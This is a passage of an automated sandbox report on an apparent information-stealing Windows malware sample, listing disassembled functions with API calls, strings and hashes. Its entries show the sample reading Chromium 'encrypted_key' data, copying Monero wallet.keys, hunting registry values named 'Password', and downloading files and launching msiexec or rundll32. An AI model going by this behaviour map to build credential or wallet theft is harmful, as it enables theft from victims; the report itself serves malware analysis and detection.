                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: fba263a8d887c0580760cab14723a49485ef120eec6685dc51805412bea19921
                              • Instruction ID: 4bf468df2b9615da6fc2d41fc84afc00d3b570feec6fab6609986e3798ccde4e
                              • Opcode Fuzzy Hash: fba263a8d887c0580760cab14723a49485ef120eec6685dc51805412bea19921
                              • Instruction Fuzzy Hash: EE12ED71810108AADB19EBA4DC92FEEB778FF14300F504169F516A6691EF346B4ACF63
                              Function 008B52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A6280: InternetOpenA.WININET(008C0DFE,00000001,00000000,00000000,00000000), ref: 008A62E1
                                • Part of subcall function 008A6280: StrCmpCA.SHLWAPI(?,0142F028), ref: 008A6303
                                • Part of subcall function 008A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A6335
                                • Part of subcall function 008A6280: HttpOpenRequestA.WININET(00000000,GET,?,0142EB78,00000000,00000000,00400100,00000000), ref: 008A6385
                                • Part of subcall function 008A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008A63BF
                                • Part of subcall function 008A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008A63D1
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008B5318
                              • lstrlen.KERNEL32(00000000), ref: 008B532F
                                • Part of subcall function 008B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008B8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 008B5364
                              • lstrlen.KERNEL32(00000000), ref: 008B5383
                              • lstrlen.KERNEL32(00000000), ref: 008B53AE
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: a4609b2b8c91058c6176c6633964fa1be95ccde9b7b2fa97c437961166f3a8d3
                              • Instruction ID: d1ae5f0987bbdb2fd2a63153a92614dfb162b92c61d46f2e0179db6e28050313
                              • Opcode Fuzzy Hash: a4609b2b8c91058c6176c6633964fa1be95ccde9b7b2fa97c437961166f3a8d3
                              • Instruction Fuzzy Hash: 2551B070910149ABDB28EF68C996AED7779FF10301F504028E446DAAA2DF346B46CB63
                              Function 008B12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 84cf02b8ab08bd59a93d8627916894daf1784114419ac9dbf96a16a154b613d5
                              • Instruction ID: 168ec4b2e3e6dbec85bac0f4d65c7e2618e26bb65b80d70429852bf5fe21c24d
                              • Opcode Fuzzy Hash: 84cf02b8ab08bd59a93d8627916894daf1784114419ac9dbf96a16a154b613d5
                              • Instruction Fuzzy Hash: CDC196B590011DABCF18EFA4DCD9FDA7778FB64304F004598E10AAB241DB70AA85CF92
                              Function 008B4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 008B42EC
                              • lstrcat.KERNEL32(?,0142EB90), ref: 008B430B
                              • lstrcat.KERNEL32(?,?), ref: 008B431F
                              • lstrcat.KERNEL32(?,0142C8F0), ref: 008B4333
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008B8D90: GetFileAttributesA.KERNEL32(00000000,?,008A1B54,?,?,008C564C,?,?,008C0E1F), ref: 008B8D9F
                                • Part of subcall function 008A9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008A9D39
                                • Part of subcall function 008A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
                                • Part of subcall function 008A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
                                • Part of subcall function 008A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
                                • Part of subcall function 008A99C0: ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
                                • Part of subcall function 008A99C0: LocalFree.KERNEL32(008A148F), ref: 008A9A90
                                • Part of subcall function 008A99C0: CloseHandle.KERNEL32(000000FF), ref: 008A9A9A
                                • Part of subcall function 008B93C0: GlobalAlloc.KERNEL32(00000000,008B43DD,008B43DD), ref: 008B93D3
                              • StrStrA.SHLWAPI(?,0142E998), ref: 008B43F3
                              • GlobalFree.KERNEL32(?), ref: 008B4512
                                • Part of subcall function 008A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9AEF
                                • Part of subcall function 008A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,008A4EEE,00000000,?), ref: 008A9B01
                                • Part of subcall function 008A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008A4EEE,00000000,00000000), ref: 008A9B2A
                                • Part of subcall function 008A9AC0: LocalFree.KERNEL32(?,?,?,?,008A4EEE,00000000,?), ref: 008A9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 008B44A3
                              • StrCmpCA.SHLWAPI(?,008C08D1), ref: 008B44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008B44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 008B44E5
                              • lstrcat.KERNEL32(00000000,008C0FB8), ref: 008B44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 8677f552ec91dc9f91143c3af4e97e945c5798ed558c31b94e5294b68570b9b4
                              • Instruction ID: ef6a1eddf86bd1631cd057f40ee39237046ed7072980bcc49c0505e12e608618
                              • Opcode Fuzzy Hash: 8677f552ec91dc9f91143c3af4e97e945c5798ed558c31b94e5294b68570b9b4
                              • Instruction Fuzzy Hash: 597125B6900208ABDB14EBE4DC96FEE7779FB58700F044598F605D7281EA34EB45CB92
                              Function 008A1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008A12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A12B4
                                • Part of subcall function 008A12A0: RtlAllocateHeap.NTDLL(00000000), ref: 008A12BB
                                • Part of subcall function 008A12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008A12D7
                                • Part of subcall function 008A12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008A12F5
                                • Part of subcall function 008A12A0: RegCloseKey.ADVAPI32(?), ref: 008A12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 008A134F
                              • lstrlen.KERNEL32(?), ref: 008A135C
                              • lstrcat.KERNEL32(?,.keys), ref: 008A1377
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                                • Part of subcall function 008B8B60: GetSystemTime.KERNEL32(008C0E1A,01429D18,008C05AE,?,?,008A13F9,?,0000001A,008C0E1A,00000000,?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008B8B86
                                • Part of subcall function 008BA920: lstrcpy.KERNEL32(00000000,?), ref: 008BA972
                                • Part of subcall function 008BA920: lstrcat.KERNEL32(00000000), ref: 008BA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 008A1465
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008A99EC
                                • Part of subcall function 008A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008A9A11
                                • Part of subcall function 008A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008A9A31
                                • Part of subcall function 008A99C0: ReadFile.KERNEL32(000000FF,?,00000000,008A148F,00000000), ref: 008A9A5A
                                • Part of subcall function 008A99C0: LocalFree.KERNEL32(008A148F), ref: 008A9A90
                                • Part of subcall function 008A99C0: CloseHandle.KERNEL32(000000FF), ref: 008A9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 008A14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: ed73b25cc48a5bc7a4de04cf69ddfa189fa52cf186c8561798495ccf52ba8901
                              • Instruction ID: 603dc8d5720444cf84c198d7239fc9d7f036c708b399d550003a130dca709bc8
                              • Opcode Fuzzy Hash: ed73b25cc48a5bc7a4de04cf69ddfa189fa52cf186c8561798495ccf52ba8901
                              • Instruction Fuzzy Hash: 265145B1D5011967DB19EB64DC96FED733CFB54700F4041A8B60AE2191EE306B86CBA7
                              Function 008A75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008A72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008A733A
                                • Part of subcall function 008A72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008A73B1
                                • Part of subcall function 008A72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 008A740D
                                • Part of subcall function 008A72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 008A7452
                                • Part of subcall function 008A72D0: HeapFree.KERNEL32(00000000), ref: 008A7459
                              • lstrcat.KERNEL32(00000000,008C17FC), ref: 008A7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008A7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 008A765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008A768F
                              • lstrcat.KERNEL32(00000000,008C1804), ref: 008A76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 008A76D3
                              • lstrcat.KERNEL32(00000000,008C1808), ref: 008A76ED
                              • task.LIBCPMTD ref: 008A76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 359ac526d954dc3d878cf5fe33a0d126d86f0777eed5cdbccca9b33386edebb0
                              • Instruction ID: 608ffe7e61b32617f9d195b4607afb47047f2cd0633716147b02a374aa5dbdf5
                              • Opcode Fuzzy Hash: 359ac526d954dc3d878cf5fe33a0d126d86f0777eed5cdbccca9b33386edebb0
                              • Instruction Fuzzy Hash: F5311A71D00149DFDB08EBE8DC99EEE7778FB66301F144118F102EB691DA34A946DB62
                              Function 008B8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0142E740,00000000,?,008C0E2C,00000000,?,00000000), ref: 008B8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008B8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 008B8158
                              • __aulldiv.LIBCMT ref: 008B8172
                              • __aulldiv.LIBCMT ref: 008B8180
                              • wsprintfA.USER32 ref: 008B81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2774356765-3474575989
                              • Opcode ID: b3d1bb72fc3c309ec1d9a72eb8405ca4ce809a8d40645bab26918b45a6a48fa4
                              • Instruction ID: 13b7babff64258fd39b56a4c3262680befa601a5bf0342b551d5c6e48d6c7094
                              • Opcode Fuzzy Hash: b3d1bb72fc3c309ec1d9a72eb8405ca4ce809a8d40645bab26918b45a6a48fa4
                              • Instruction Fuzzy Hash: F521EAB1E44358ABDB10DFD8CC49FAEBBB8FB44B14F104619F615BB280D77869018BA5
                              Function 008A60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
                                • Part of subcall function 008A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849
                              • InternetOpenA.WININET(008C0DF7,00000001,00000000,00000000,00000000), ref: 008A610F
                              • StrCmpCA.SHLWAPI(?,0142F028), ref: 008A6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 008A618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008A61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 008A61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 008A620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 008A6249
                              • InternetCloseHandle.WININET(?), ref: 008A6253
                              • InternetCloseHandle.WININET(00000000), ref: 008A6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 4dbf70ec81d2c6040e8f3648528304653b6d791da0349d1ef26c999888cf4c77
                              • Instruction ID: b4952e40646099146010dfa590e7c6ddd598e18ba96521d16650f755deca1db1
                              • Opcode Fuzzy Hash: 4dbf70ec81d2c6040e8f3648528304653b6d791da0349d1ef26c999888cf4c77
                              • Instruction Fuzzy Hash: 605165B1900218ABEF24DFA4DC85BEE7778FB44705F108098B605E71C5EB746A85CF56
                              Function 008A72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008A733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008A73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 008A740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 008A7452
                              • HeapFree.KERNEL32(00000000), ref: 008A7459
                              • task.LIBCPMTD ref: 008A7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
